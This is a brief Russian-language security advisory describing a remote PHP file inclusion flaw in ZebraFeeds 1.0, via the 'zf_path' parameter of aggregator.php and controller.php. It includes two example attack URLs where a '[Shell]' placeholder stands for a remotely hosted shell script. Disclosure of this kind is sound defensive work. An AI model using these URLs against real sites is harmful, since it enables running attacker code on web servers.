Программа: ZebraFeeds 1.0 

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «zf_path» сценариями aggregator.php и controller.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример:

http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]



Оставить мнение